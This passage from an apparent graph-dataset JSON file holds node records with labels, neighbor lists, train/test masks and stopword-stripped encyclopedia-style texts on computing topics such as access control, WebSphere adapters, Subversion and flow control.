    "neighbors": [
      3462,
      6576,
      5650,
      5524,
      1943
    ],
    "mask": "Train"
  },
  {
    "node_id": 4912,
    "label": 4,
    "text": "Lattice-based_access_control:lattice-based access control computer security lattice-based access control lbac complex access control model based interaction combination objects resources computers applications subjects individuals groups organizations type label-based mandatory access control model lattice used define levels security object may subject may access subject allowed access object security level subject greater equal object mathematically security level access may also expressed terms lattice partial order set object subject greatest lower bound meet least upper bound join access rights example two subjects b need access object security level defined meet levels b another example two objects x combined form another object z assigned security level formed join levels x lbac also known label-based access control rule-based access control restriction opposed role-based access control rbac lattice based access control models first formally defined denning 1976 see also sandhu 1993",
    "neighbors": [
      1792,
      3360,
      3616,
      5573,
      8262,
      8838,
      9958,
      2737,
      210,
      8210,
      10580,
      7260,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4913,
    "label": 2,
    "text": "WebSphere_Optimized_Local_Adapters:websphere optimized local adapters ibm websphere optimized local adapters ola wola functional component ibm websphere application server z/os provides efficient cross-memory mechanism calls inbound z/os outbound z/os avoids overhead communication mechanisms capable high volume exchange messages wola extension existing cross-memory exchange mechanism z/os wola providing external interface z/os address spaces outside z/os server may participate cross-memory exchanges wola supports connectivity z/os server one following cics ims batch unix systems services alcs wola first made available z/os version 7 fixpack 4 7.0.0.4 functional enhancements appeared subsequent fixpacks documented article websphere optimized local adapters z/os wola ola short origins desire provide efficient inbound calling mechanism outside java ee environment exercise java ee assets requirement particularly pronounced z/os traditional batch processing sought use growing base programming assets based java ee ejb technology inbound solutions existed example respective strengths also particular shortcomings overhead latency difficulty construction deficiencies security transaction propagation model original design point optimized local adapters architects solution extended design include bi-directional invocations inbound z/os external address space outbound external address space architects solution chose leverage existing element z/os design called local communications cross-memory mechanism used websphere application server z/os since v4.x days optimized iiop traffic application servers lpar ola essentially externalization existing cross-memory mechanism address spaces outside z/os may connect exchange messages across shared memory space external address space programs access ola interface using set supplied apis java programs running z/os access ola interface implementation packaged standard jca resource adapter currently supported external address spaces supported z/os ola programming languages supported external address spaces java programming language used access z/os ola inside java ee containers z/os ibm websphere optimized adapters function support updated new versions fixpacks released function first made available z/os version 7 release 0 fixpack 4 level 7.0.0.4 wola introduced fixpack 4 z/os version 7 release 0 product application maintenance resulted new directory product file system provided wola modules shared objects jca resource adapter development class libraries shell script olainstall.sh created necessary unix symbolic links runtime environment product install file system functional supported offered 7.0.0.4 release fixpack 12 z/os version 7 release 0 provided two updates wola support websphere application server z/os version 8 release 0 continued support websphere optimized local adapters wola shipped incorporated product meant running olainstall.sh longer required create unix symbolic links product files addition following function updates provided function provides means detecting loss data resource attached jca connection factory automatically failing defined alternate jndi detection primary data resource recovery failback also element functional design resource failover design present websphere application server version 8 across platforms jdbc jca z/os version 8 provides support wola resource failover part general support jca resource failover invocation failover occurs configurable threshold number getconnection failures occur failover invoked new getconnection requests routed alternate connection factory connection pool failback occurs z/os determines failed primary data resource returned new getconnection requests processed primary connection factory common usage pattern function outbound cics target cics region routing region failover function provides ability architect multiple routing regions loss single routing region affect overall availability cics overall several connection pool custom properties added support resource failover failback mechanism note connection pool custom properties exist function search string cdat_dsfailover z/os infocenter complete listing note z/os 8.5.0.0 provides wola support functionally identical 8.0.0.1 fixpack 1 websphere application server z/os version 8 provided following functional updates wola prior 8.0.0.1 native api modules supplied 31-bit callable format modules four-character prefix bboa* associated module name 8.0.0.1 31-bit 64-bit callable api modules provided 31-bit modules retain four-character prefix bboa* module name 64-bit modules carry four-character prefix bbga* module name number apis remains 13 specific apis usage infocenter search cdat_olaapis z/os v7 wola support smf limited inbound calls inbound wola calls target ejbs z/os container identified iiop calls captured smf iiop calls indistinguishable iiop call normal z/os smf 120 subtype 9 record 120.9 shorthand notation used capture inbound call information z/os 8.0.0.0 smf 120.9 record capture function modified identify inbound wola calls separate inbound iiop calls z/os 8.0.0.1 smf 120.10 record created capture information outbound calls z/os smf 120.10 record eight sections one record created outbound request infocenter search rtrb_smfsubtype10 functional update provides ability distribute outbound calls across multiple external address spaces registered given z/os server using registration name common usage pattern would multiple cics regions stateless target program service deployed new environment variable created indicate type work distribution desired following illustrates usage function infocenter search cdat_olacustprop cross-memory nature wola communications implies z/os server external address space must z/os logical partition lpar z/os 8.0.0.1 provides proxy function allow wola callers wola targets located separately includes location operating system instances z/os function two formats proxy support outbound calls proxy support inbound calls provides mechanism java applications may use supplied wola jca resource adapter access target address space remote z/os example usage pattern would development test proposed application access cross-memory wola connection target z/os system provided supplied wola proxy application installed z/os server enabled wola following picture illustrates topology network flow application z/os system way iiop wola connection factory informed iiop flow proxy way several new custom properties connection pool proxy application z/os receives call forwards actual cross-memory wola connection named target service topology limitations compared outbound wola calls z/os lpar global transactions requiring two-phase commit propagated across iiop connection wola proxy user identity thread asserted target service z/os provides mechanism non-java applications external address space may make inbound calls target wola-enabled ejb remote instance either another z/os lpar distributed platform supplied wola proxy application installed local z/os instance required handle initial cross-memory wola call forward named target ejb remote instance following picture illustrates topology target wola-enabled ejb unaware proxy use inbound flow arrives iiop call cross-memory wola lpar used calling program must indicate flow use proxy service done parameter bboa1inv bboa1srq 2 requesttype parameter tells local proxy application treat requested service specified jndi name target ejb request invoke ejb using iiop requires local remote instances federated names spaces operate single cell jndi lookup succeed 8.0.0.3 8.5.0.1 wola support included ibm integration designer bpel processes 8.0.0.4 8.5.0.1 support updated include rrs transaction context assertion ims dependent regions wola fixpack 8.0.0.5 8.5.0.2 provided two functional enhancements 1 rrs transaction context assertion ims wola otma 2 enhanced support cics channels containers ims transaction enhanced support cics channels containers prior 8.0.0.5 8.5.0.2 cics channels containers support limited single fixed-name channel request response single container type bit char 8.0.0.5 8.5.0.2 optimized local adapters may categorized following components optimized local adapters implemented cics task related user exit true provides essential connectivity cics cross memory z/os address space addition link server task bbo link invocation task bbo supplied calls cics bbo /bbo link server task shields programming specifics cics programs ola call handled supplied tasks named cics program invoked standard exec cics link call named cics program remains unchanged unaware call came using ola target program cics must able invoked link call commarea channels/containers supported bboc transaction also supplied provide set control commands things manually start true pltpi stop true start stop link server well control management functions ola programming interface module library data set must concatenated cics region dfhrpl dd statement following picture summarizes wola cics support transaction propagation security assertion optimized local adapters implemented external subsystem ims usage supported message processing programs mpp batch message processing programs bmp ims fast path ifp batch dl/i applications calls ims use external subsystem attach facility esaf interface used subsystems db2 mq calls ims dependent region may done using otma directly program ims uses ola apis host service described otma provides ola transparency ims applications cost overhead using ola apis ims application reduces overhead results better performance throughput programming apis ims format syntax introduced originally updated aware ims running use esaf ola.rar file implements jca resource adapter must one shipped fixpack 7.0.0.12 later use ims method parameters updated ims support update made available re-installing ola.rar comes 7.0.0.12 following picture summarizes wola ims support transaction propagation security assertion external address space accesses ola mechanism supplied interface modules documented apis 13 apis present time categorized java programs running z/os environment wishing target invocation outside must implement ola interface stateless session bean using ola class files supplied development tooling support java program wishing initiate ola call outbound may implemented either servlet ejb java program codes supplied jca resource adapter ola.rar using class files supplied development tooling support external address spaces target outbound call must state ready accept call two basic models exist apis support modes synchronous provides simpler programming model program control returned calling program response received asynchronous provides architect opportunity process work without wait response coming back long running target process possible design ola-specific programming artifacts serve bridges ola interface existing assets serves minimize impact existing programming assets limits degree platform lock 13 apis categorized following categories infocenter full write-up along parameter lists return code rc reason codes rsn search cdat_olaapis common inbound api usage model would case bboa1reg api used register websphere application server z/os daemon group cell short name multiple invocations bboa1inv used invoke target ejb bboa1inv synchronous program control held ejb returns response api useful calling program knows size response message advance response message size unknown time call primitive apis bboa1srq send request bboa1rcl get response length bboa1get get message data would appropriate calling program determines finished work uses bboa1urg unregister daemon group target java program longer response interval asynchronous model likely better following picture illustrates asynchronous call would done using known primitive api bboa1srq async=1 parameter set picture illustrates asynchronous mode allows non-java program get control processing implies checking response future point bboa1rcl used purpose example bboa1rcl issued synchronously parameter async=0 response available bboa1rcl provide length program control returns program response available bboa1rcl holds program control one available bboa1rcl async=1 return x'ffffffff response available program control returned immediately illustrations outbound may found wp101490 document found ibm techdocs website note outbound cics would require api coding case supplied bbo /bbo link server transactions would processing link server transactions host service using internal constructs similar bboa1srv api outbound batch program would require use apis host service optimized local adapters support two-phase commit 2pc processing cics inbound advent maintenance 7.0.0.12 optimized local adapters also support two-phase commit outbound cics prior 7.0.0.12 transactional support cics limited sync return ims support transactional assertion inbound ims dependent regions provided fixpack 8.0.0.4 8.5.0.1 transaction assertion outbound ims wola/otma provided fixpack 8.0.0.5 transactional propagation supported inbound outbound batch uss airlines line control optimized local adapters capable asserting identity following circumstances z/os optimized local adapters used within given lpar cross-memory mechanism go lpars machine br",
    "neighbors": [
      9988,
      4906,
      11024,
      1235,
      8502,
      3323,
      5598
    ],
    "mask": "None"
  },
  {
    "node_id": 4914,
    "label": 2,
    "text": "Multiple_Independent_Levels_of_Security:multiple independent levels security multiple independent levels security/safety mils high-assurance security architecture based concepts separation controlled information flow implemented separation mechanisms support untrusted trustworthy components ensuring total security solution non-bypassable evaluatable always invoked tamperproof mils solution allows independent evaluation security components trusted composition mils builds older bell la padula theories secure systems represent foundational theories dod orange book mils system employs one separation mechanisms e.g. separation kernel partitioning communication system physical separation maintain assured data process separation mils system supports enforcement one application/system specific security policies authorizing information flow components security domain trustworthy security monitors e.g. access control guards downgraders crypto devices etc. properties convenient acronym characteristics neat 'trustworthy means component certified satisfy well defined security policies level assurance commensurate level risk component e.g. single level access control guards evaluated cc separation mechanisms evaluated high robustness two-level separation guards type crypto mils system 'untrusted means confidence system meets specification respect security policy following companies mils separation kernel products companies separation methods creating mils products",
    "neighbors": [
      5247,
      4067,
      3652,
      1350,
      8904,
      2761,
      4875,
      10962,
      10170,
      5373,
      2975
    ],
    "mask": "None"
  },
  {
    "node_id": 4915,
    "label": 4,
    "text": "Covenant_Aviation_Security:covenant aviation security covenant aviation security llc cas chicago company provides security services aviation industry michael bolles president since july 2012 covenant aviation security provides airport security services transportation security administration screening partnership program spp 2002 cas awarded multiple contracts providing commercial screening services tsa privatization pilot program initiated aviation transportation security act cas mobilized hired 1,200 screening personnel san francisco international airport tupelo regional airport within six weeks contract award 2005 cas awarded screening contract sioux falls regional airport first airport de-federalize workforce spp 2005 u.s. department homeland security designated cas airport passenger baggage screening services anti-terrorist technology support anti-terrorism fostering effective technologies act 2002 also year cas awarded screening contract sioux falls international airport fsd cas provides security services john f. kennedy international airport laguardia airport orlando international airport san francisco international airport security services include limited following passenger baggage screening direct access control personnel screening cargo screening cctv monitoring report management security assessments operate screening equipment x-ray explosive trace detection walk-through metal detector hand-held metal detector monitoring perimeter intrusion detection systems clients include federal government tsa port airport authorities select airlines covenant one largest providers security screening contract tsa screening partnership program tsa since awarded contracts nine airports formerly contracted covenant companies american association airport executives aaae – aaae world largest professional organization airport executives representing thousands airport management personnel public-use commercial general aviation airports aaae members represent 850 airports hundreds companies organizations support airports aaae serves membership results-oriented representation washington d.c. delivers wide range industry services professional development opportunities including training meetings conferences highly respected accreditation program airports council international – north america aci-na – aci-na represents local regional state governing bodies operate commercial airports united states canada aci-na members enplane 95 percent domestic virtually international airline passenger cargo traffic north america mission aci-na advocate policies provide services strengthen ability commercial airports serve passengers customers communities national safe skies alliance safeskies national safe skies alliance inc. safe skies non-profit organization works airports government industry maintain safe effective aviation security system since 1997 trusted resource decision makers seeking impartial information airport security technologies procedures november 2006 report department homeland security office inspector general found tsa officials collaborated cas san francisco international airport tip cas screeners undercover tests tests whether screeners properly inspecting passengers carry-on luggage security checkpoints august 2003 may 2004 precise physical descriptions undercover personnel way test checkpoints communicated screeners according san francisco chronicle report stated tsa officials covenant managers airport notified screening personnel advance tester approaching checkpoint provided descriptions officials airport screening control center tracked undercover testers surveillance cameras foot report said 'broadcast descriptions locations testers checkpoints assist supervisors identifying testers facilitate passing covert penetration tests article newspaper wrongful firing lawsuit related events reported according allegations lawsuit posing passengers decoys try take dummy bombs unloaded guns contraband airport security checkpoints lawsuit said covenant tracked decoys via closed-circuit television cameras tipped workers security gates expect test handing descriptions stopped january 2005 screeners still alerted whenever undercover operations undertaken despite report cas rehired 314 million four-year contract airport employees firm tsa disciplined none lost jobs occurrence security warned test reported orlando international airport regular warning different descriptions undercover agents time mississippi representative bennie thompson said report troubling observing public expected confidence screening systems managers game system november 2010 fox news reported representative john mica r-fla pushing airports use private contractors lieu tsa since 2006 received 1,700 gerald berry campaign contributions mica spokesman said contributions improperly influenced mica",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4916,
    "label": 3,
    "text": "University_of_Edinburgh_School_of_Informatics:university edinburgh school informatics school informatics academic unit university edinburgh scotland responsible research teaching outreach commercialisation informatics created 1998 former department artificial intelligence centre cognitive science department computer science along artificial intelligence applications institute aiai human communication research centre research school informatics draws multiple disciplines school particularly known research areas artificial intelligence computational linguistics systems biology mathematical logic theoretical computer science also contributes many areas informatics school ranked 15th world latest 2014 research excellence framework ref successor research assessment exercise rae ranking school informatics ranked 12th world qs world university rankings 2014 school informatics awarded 5*a uk hefce 2001 rae computer science department country achieve highest possible rating 2008 rae school quality profile 35/50/15/0/0 means 100 full-time equivalent fte staff research outputs evaluated 35 found world-leading 4* 50 internationally excellent 3* figures interpreted number ways place school first volume tied second following cambridge 45/45/10/0/0 percentage research rated 3* 4* school generally considered world-leading standing foremost u.s. institutes particularly areas artificial intelligence natural language processing machine translation theoretical computer science school seven research institutes anc investigates theoretical empirical study brain processes artificial learning systems drawing neuroscience cognitive science computer science computational science mathematics statistics centre intelligent systems applications cisa basic applied research development knowledge representation reasoning artificial intelligence applications institute aiai technology transfer organisation promotes benefits application artificial intelligence research commercial industrial government organisations worldwide ilcc performs research aspects natural language processing drawing machine learning statistical modeling computational psychological linguistic theories communication among humans humans machines using text speech modalities icsa performs research architecture engineering future computing systems performance scalability innovative algorithms architectures compilers languages protocols ipab links computational action perception representation transformation generation processes real virtual worlds statistical machine learning computer vision mobile humanoid robotics motor control graphics visualization lfcs develops applies foundational understanding computation communication formal models mathematical theories software tools senior academic staff include alumni school informatics include edinburgh cowgate fire december 2002 destroyed number buildings including 80 south bridge housed around one third school renowned ai library space quickly made available university appleton tower replacement june 2008 school dispersed five sites three george square campus appleton tower buccleuch place forrest hill two king buildings james clerk maxwell building darwin building june july 2008 school research moved new home informatics forum building interaction designed bennetts associates reaich hall buro happold houses 500 researchers including staff graduate students construction began october 2005 forum completion july 2008 finally brought school researchers together one roof ten years inception august 2018 school gained another research space form bayes centre purpose-built data science artificial intelligence hub shared multiple data science informatics groups well university maxwell graduate institute encompassing phd research output mathematics departments edinburgh heriot-watt university",
    "neighbors": [
      10049,
      1890,
      6306,
      996,
      9535,
      6662,
      10116,
      4392,
      5384,
      8562,
      9492,
      10102,
      5947,
      415
    ],
    "mask": "None"
  },
  {
    "node_id": 4917,
    "label": 8,
    "text": "Hitbox_(web_analytics):hitbox web analytics hitbox popular web counter web analytics product created websidestory taken omniture subsequently taken adobe originally adult entertainment websites widely used commercial organizations across variety industrial sectors complete integrated metrics solution monitoring web traffic driving marketing adobe plans completely phase moving clients flagship product sitecatalyst companies place javascript files web servers linked html script page code combination two makes request data collection servers page viewed user cookie placed users computer contains unique id unique id passed request data collection servers processing data hitbox ties together page views get perspective user moved site custom information passed request well information http header browser referrer browser details web analytics services declared spyware several anti-spyware organizations",
    "neighbors": [
      3462,
      10604,
      6576,
      8914,
      2899,
      119,
      10392
    ],
    "mask": "None"
  },
  {
    "node_id": 4918,
    "label": 5,
    "text": "Flow_control_(data):flow control data data communications flow control process managing rate data transmission two nodes prevent fast sender overwhelming slow receiver provides mechanism receiver control transmission speed receiving node overwhelmed data transmitting node flow control distinguished congestion control used controlling flow data congestion actually occurred flow control mechanisms classified whether receiving node sends feedback sending node flow control important possible sending computer transmit information faster rate destination computer receive process happen receiving computers heavy traffic load comparison sending computer receiving computer less processing power sending computer stop-and-wait flow control simplest form flow control method message broken multiple frames receiver indicates readiness receive frame data sender waits receipt acknowledgement ack every frame specified time called time receiver sends ack let sender know frame data received correctly sender send next frame ack frame ack lost transmission frame re-transmitted re-transmission process known arq automatic repeat request problem stop-and wait one frame transmitted time often leads inefficient transmission sender receives ack transmit new packet time sender channel unutilised pros advantage method flow control simplicity cons sender needs wait ack every frame transmits source inefficiency particularly bad propagation delay much longer transmission delay stop wait also create inefficiencies sending longer transmissions longer transmissions sent likely chance error protocol messages short errors likely detected early inefficiency created single messages broken separate frames makes transmission longer method flow control receiver gives transmitter permission transmit data window full window full transmitter must stop transmitting receiver advertises larger window sliding-window flow control best utilized buffer size limited pre-established typical communication sender receiver receiver allocates buffer space n frames n buffer size frames sender send receiver accept n frames without wait acknowledgement sequence number assigned frames order help keep track frames receive acknowledgement receiver acknowledges frame sending acknowledgement includes sequence number next frame expected acknowledgement announces receiver ready receive n frames beginning number specified sender receiver maintain called window size window less equal buffer size sliding window flow control far better performance stop-and-wait flow control example wireless environment data rates low noise level high waiting acknowledgement every packet transferred feasible therefore transferring data bulk would yield better performance terms higher throughput sliding window flow control point point protocol assuming entity tries communicate current data transfer complete window maintained sender indicates frames send sender sends frames window waits acknowledgement opposed acknowledging every frame sender shifts window corresponding sequence number thus indicating frames within window starting current sequence number sent automatic repeat request arq algorithm used error correction negative acknowledgement nak causes retransmission word error well next n–1 words value n usually chosen time taken transmit n words less round trip delay transmitter receiver back therefore buffer needed receiver normalized propagation delay tp length l propagation velocity v tt bitrate r framerate f get utilization must define window size n n greater equal 2a 1 utilization 1 full utilization transmission channel less 2a 1 equation must used compute utilization selective repeat connection oriented protocol transmitter receiver window sequence numbers protocol maximum number messages sent without acknowledgement window becomes full protocol blocked acknowledgement received earliest outstanding message point transmitter clear send messages section geared towards idea comparing stop-and-wait sliding window subsets go back n selective repeat error free formula_1 errors formula_2 define throughout average number blocks communicated per transmitted block convenient calculate average number transmissions necessary communicate block quantity denote 0 determine equation formula_3 transmit flow control may occur transmission rate may controlled network dte requirements transmit flow control occur independently two directions data transfer thus permitting transfer rates one direction different transfer rates direction transmit flow control flow control performed common rs-232 pairs control lines usually referred hardware flow control hardware flow control typically handled dte master end first raising asserting line command side example hardware flow control half-duplex radio modem computer interface case controlling software modem computer may written give priority incoming radio signals outgoing data computer paused lowering cts modem detects reception conversely xon/xoff usually referred software flow control open-loop flow control mechanism characterized feedback receiver transmitter simple means control widely used allocation resources must prior reservation hop-to-hop type open-loop flow control inherent problems maximizing utilization network resources resource allocation made connection setup using cac connection admission control allocation made using information already old news lifetime connection often over-allocation resources reserved unused capacities wasted open-loop flow control used atm cbr vbr ubr services see traffic contract congestion control open-loop flow control incorporates two controls controller regulator regulator able alter input variable response signal controller open-loop system feedback feed forward mechanism input output signals directly related increased traffic variability also lower arrival rate system higher loss rate open control system controllers operate regulators regular intervals assurance output variable maintained desired level may cheaper use model open-loop model unstable closed-loop flow control mechanism characterized ability network report pending network congestion back transmitter information used transmitter various ways adapt activity existing network conditions closed-loop flow control used abr see traffic contract congestion control transmit flow control described form closed-loop flow control system incorporates basic control elements sensor transmitter controller regulator sensor used capture process variable process variable sent transmitter translates variable controller controller examines information respect desired value initiates correction action required controller communicates regulator action needed ensure output variable value matching desired value therefore high degree assurance output variable maintained desired level closed-loop control system feedback feed forward system feedback closed-loop system feed-back mechanism directly relates input output signals feed-back mechanism monitors output variable determines additional correction required output variable value fed backward used initiate corrective action regulator control loops industry feedback type feed-forward closed loop system measured process variable input variable measured signal used fashion feedback system closed-loop model produces lower loss rate queuing delays well results congestion-responsive traffic closed-loop model always stable number active lows bounded sliding window",
    "neighbors": [
      1154,
      1541,
      1030,
      3847,
      2327,
      5529,
      5146,
      5531,
      2203,
      9251,
      10924,
      5945,
      7865,
      9020,
      5439,
      5825,
      835,
      1478,
      10696,
      5071,
      2640,
      4692,
      1893,
      2793,
      10864,
      5118
    ],
    "mask": "Test"
  },
  {
    "node_id": 4919,
    "label": 6,
    "text": "Apache_Subversion:apache subversion apache subversion often abbreviated svn command name svn software versioning revision control system distributed open source apache license software developers use subversion maintain current historical versions files source code web pages documentation goal mostly compatible successor widely used concurrent versions system cvs open source community used subversion widely example projects apache software foundation free pascal freebsd gcc sourceforge codeplex previously common host subversion repositories subversion created collabnet inc. 2000 top-level apache project built used global community contributors collabnet founded subversion project 2000 effort write open-source version-control system operated much like cvs fixed bugs supplied features missing cvs 2001 subversion advanced sufficiently host source code february 2004 version 1.0 released november 2009 subversion accepted apache incubator marked beginning process become standard top-level apache project became top-level apache project february 17 2010 release dates extracted apache subversion codice_1 file records release history subversion offers two types repository storage original development subversion used berkeley db package subversion limitations berkeley db usage program accesses database crashes terminates forcibly data loss corruption occurs repository remains offline berkeley db replays journal cleans outstanding locks safest way use subversion berkeley db repository involves single server-process running one user instead shared filesystem 2004 new storage subsystem developed named fsfs works faster berkeley db backend directories large number files takes less disk space due less logging beginning subversion 1.2 fsfs became default data store new repositories etymology fsfs based subversion use term filesystem repository storage system fsfs stores contents directly within operating system filesystem rather structured system like berkeley db thus subversion filesystem atop filesystem new file system called fsx development remove limitations fsfs version 1.9 considered production-ready access subversion repositories take place three means access fsfs berkeley db repositories 1.x version client work 1.x server newer clients servers additional features performance capabilities fallback support older clients/servers internally subversion system comprises several libraries arranged layers performs specific task allows developers create tools desired level complexity specificity one view subversion filesystem two-dimensional two coordinates used unambiguously address filesystem items revision subversion filesystem root used access contents revision files stored links recent change thus subversion repository quite compact system consumes storage space proportional number changes made number revisions subversion filesystem uses transactions keep changes atomic transaction operates specified revision filesystem necessarily latest transaction root changes made either committed becomes latest revision aborted transaction actually long-lived filesystem object client need commit abort transaction rather also begin transaction exit re-open transaction continue using potentially multiple clients access transaction work together atomic change though existing clients expose capability one important feature subversion filesystem properties simple name value pairs text properties occur filesystem entries i.e. files directories versioned like changes filesystem subversion client reserves 'svn prefix built-in properties names used define custom properties subversion also uses properties revisions like properties filesystem entries names completely arbitrary subversion client using certain properties prefixed 'svn however properties versioned changed later allowed pre-revprop-change hook subversion uses inter-file branching model perforce implement branches tagging branch separate line development tagging refers labeling repository certain point time easily found future subversion difference branches tags used new branch tag set using svn copy command used place native operating system mechanism copied directory linked original repository preserve history copy takes little extra space repository versions branch maintain history file point copy plus changes made since one merge changes back trunk branches known problem subversion affects implementation file directory rename operation subversion implements renaming files directories copy new name followed delete old name names change data relating edit history remains subversion still use old name older revisions tree however subversion may become confused move conflicts edits made elsewhere regular commits merging branches subversion 1.5 release addressed scenarios others remained problematic subversion 1.8 release addressed problems making moves first-class operation client still treated copy+delete repository subversion lacks repository-administration management features instance someone may wish edit repository permanently remove historical records certain data subversion built-in support achieve simply subversion stores additional copies data local machine become issue large projects files developers work multiple branches simultaneously versions prior 1.7 .svn directories client side could become corrupted ill-advised user activity like global search/replace operations starting version 1.7 subversion uses single centralized .svn folder per working area subversion store modification times files file checked subversion repository 'current date instead modification time repository file checked repository date check-in instead modification time file checked might always wanted mitigate third-party tools exist allow preserving modification time filesystem meta-data however giving checked files current date important well — tools like make 1 take notice changed file rebuilding subversion uses centralized revision control model ben collins-sussman one designers subversion believes centralised model would help prevent insecure programmers hiding work team members users version control systems see centralised model detrimental famously linus torvalds attacked subversion model developers subversion often deal well filename normalization performed hfs+ filesystem cause problems files accented characters names added repository non-hfs+ filesystem repository used hfs+ revision numbers difficult remember version-control system reason systems offer symbolic tags user-friendly references subversion feature documentation recommends use instead different nature instead implementing tags references points history subversion recommends making snapshot copies well-known subdirectory codice_2 space repository tree predefined references available head base prev committed history-to-space projection multiple issues 1 snapshot taken system assign special meaning name tag/snapshot difference copy reference revision recorded snapshot accessed url makes operations less convenient others impossible instance naïve codice_3 work slightly complicated achieve requiring user know input url/paths snapshots instead names codice_4 operations like instance codice_5 impossible 2 two ideally independent object types live repository tree fight top ensue words often difficult decide level create codice_2 subdirectory 3 tags conventional definition read-only light-weight repository client subversion copies read-only light-weight repository incredibly heavy-weight client address issues posters subversion mailing lists suggested new feature called labels aliases svn labels would closely resemble tags systems cvs git fact subversion global revision numbers opens way simple label → revision implementation yet 2013 progress made symbolic tags list wanted features collabnet continued involvement subversion project runs independent open source community november 2009 project accepted apache incubator aiming become part apache software foundation efforts since march 2010 project formally known apache subversion part apache top-level projects october 2009 wandisco announced hiring core subversion committers company moved become major corporate sponsor project included hyrum wright president subversion corporation release manager subversion project since early 2008 joined company lead open source team subversion open-source community provide binaries potential users download binaries volunteers subversion project include official graphical user interface gui use subversion third parties developed number different guis along wide variety additional ancillary software work announced 2009 included subversionj java api implementation obliterate command similar provided perforce enhancements sponsored wandisco subversion committers normally least one two new features active development one time 1.7 release subversion october 2011 included streamlined http transport improve performance rewritten working-copy library",
    "neighbors": [
      6154,
      10764,
      6161,
      1047,
      8217,
      9245,
      5663,
      11303,
      5677,
      1594,
      9789,
      7742,
      7233,
      7750,
      4171,
      7261,
      11357,
      8799,
      8294,
      8810,
      2163,
      6774,
      11389,
      2689,
      1668,
      5768,
      10377,
      8860,
      7326,
      3744,
      2222,
      6338,
      198,
      1222,
      4294,
      6352,
      8408,
      8425,
      747,
      7409,
      2804,
      9972,
      6403,
      8460,
      1296,
      2322,
      5397,
      5399,
      2841,
      1307,
      2338,
      3877,
      4398,
      1327,
      7983,
      1851,
      7485,
      2368,
      10560,
      4419,
      4423,
      2377,
      842,
      4944,
      5969,
      6993,
      1363,
      865,
      11111,
      8554,
      3951,
      5492,
      1913,
      8582,
      908,
      7565,
      7567,
      11161,
      6555,
      2465,
      10661,
      5047,
      4538,
      6074,
      8644,
      1991,
      5066,
      8139,
      9177,
      9179,
      990,
      479,
      10719,
      11235,
      487,
      5612,
      9201,
      7666,
      3571,
      7157,
      7159,
      11256,
      1018,
      9724,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4920,
    "label": 9,
    "text": "River_Trail_(JavaScript_engine):river trail javascript engine river trail also known parallel javascript open-source software engine designed intel executing javascript code using parallel computing multi-core processors river trail announced intel developer forum september 2011 demonstrated using firefox extension developed intel brendan eich original author javascript promised would promote river trail within ecma international saying demo shows 15x speedup serial javascript lights ridiculously parallel hardware modern cpus gpus audio video image processing automated voice response computer vision 3d gaming etc – written memory-safe clean functional javascript without threads data races deadlocks river trail leverages intel opencl sdk exploit multiple cpu cores well data parallel instructions ex avx sse speedup greater cpu core count would imply native implementation river trail firefox spidermonkey javascript engine announced september 2012 added nightly firefox builds april 2013 january 2015 code removed firefox use engine scripts uses special api based three pillars type called codice_1 several methods prototype codice_1 elementary functions",
    "neighbors": [
      8068,
      3462,
      6791,
      1802,
      6154,
      8605,
      6176,
      10145,
      803,
      5031,
      1203,
      10675,
      438,
      8126,
      7871,
      5311,
      833,
      5067,
      339,
      5078,
      4056,
      9560,
      9561,
      8923,
      8289,
      9195,
      5101,
      10991,
      10739,
      10744
    ],
    "mask": "None"
  },
  {
    "node_id": 4921,
    "label": 9,
    "text": "Adin_Falkoff:adin falkoff adin d. falkoff 19 december 1921 – 13 august 2010 engineer computer systems programming systems designer mostly known work programming language apl systems ibm falkoff born new jersey received bachelor engineering b.ch.e city college new york 1941 master degree m.a mathematics yale university 1963 researcher manager ibm research since 1955 forty years retiring collaborated ken iverson 1960 1980 design development use apl programming language interactive environment special note landmark article formal description system/360 describing new ibm system/360 computer system formally apl programming notation falkoff visiting member faculty ibm systems research institute taught computer science yale university one researchers established managed ibm philadelphia scientific center received many awards work especially apl",
    "neighbors": [
      9993,
      10508,
      1178,
      8987,
      667,
      10668,
      9019,
      1099,
      7630,
      2519,
      1883,
      11099,
      9825,
      11625,
      4331,
      2670,
      8695,
      505,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4922,
    "label": 9,
    "text": "Eltron_Programming_Language:eltron programming language eltron programming language epl epl2 printer control language used produce printed paper labels various eltron zebra model printers newer printers support also zebra programming language zpl epl2 markup line-at-a-time language suitable printing media reduced space although supports bitmaps therefore arbitrary images use usually labels including barcode information epl2 line starts one letters indicating command may followed one comma-separated arguments commands arguments case-sensitive arguments numeric belong fixed set options see i.e reverse argument inlined string set variable values must surrounded double-quotes see i.e text argument although epl2 language quite lengthy complete number commands basic original author r team led eddy lee main author steven huang",
    "neighbors": [
      8763
    ],
    "mask": "Test"
  },
  {
    "node_id": 4923,
    "label": 0,
    "text": "Juergen_Pirner:juergen pirner juergen pirner born 1956 german creator jabberwock chatterbot 2003 loebner prize pirner created jabberwock modelling jabberwocky lewis carroll poem name initially jabberwock would give rude fantasy-related answers years pirner programmed better responses 2007 taught 2.7 million responses pirner lives hamburg germany",
    "neighbors": [
      6208
    ],
    "mask": "Test"
  },
  {
    "node_id": 4924,
    "label": 3,
    "text": "J.B._Harold_Murder_Club:j.b. harold murder club j.b. harold murder club known j.b. harold jikenbo 1 murder club japan 1986 murder mystery adventure game developed riverhillsoft released nec pc-98 msx ms-dos nec turbografx-cd turboduo nintendo ds platforms turbografx-cd version featured still photographs text audio voices well option select language english japanese first entry j.b. harold series released various platforms sold 20 million copies 2011 horrible murder taken place sleepy little town liberty bill robbins wealthy man known wild womanizing ways victim list possible suspects keeps growing j.b. harold must figure case solve mystery need travel various locations interview people search clues game laid grid map displays various locations though game mainly presented form still photos j.b. harold murder club first japanese j b. harold series murder mystery graphic adventure games includes manhattan requiem 1987 kiss murder 1988 d.c connection 1989 blue chicago blues 1995 j.b harold murder club first title series released united states series sold 20 million copies ios version second game manhattan requiem released western world 2008 enhanced remake game released japanese nintendo ds title keiji j.b. harold jikenbo satsujin club game reviewed 1991 dragon 176 hartley patricia kirk lesser role computers column reviewers gave game 4 5 stars wrote great game mystery fans thinking game well worth money video games computer entertainment critic donn nauert praised game sound graphics playability giving overall score 9 10 defunct games stated type game doubt appeal gamers love good murder mystery perfect denying best game kind type game n't see much anymore real shame j.b harold lot fun gave game score 70 gamespot included game list titles deserve enhanced remake stating one difficult games ever made memorable voice acting time day n't much 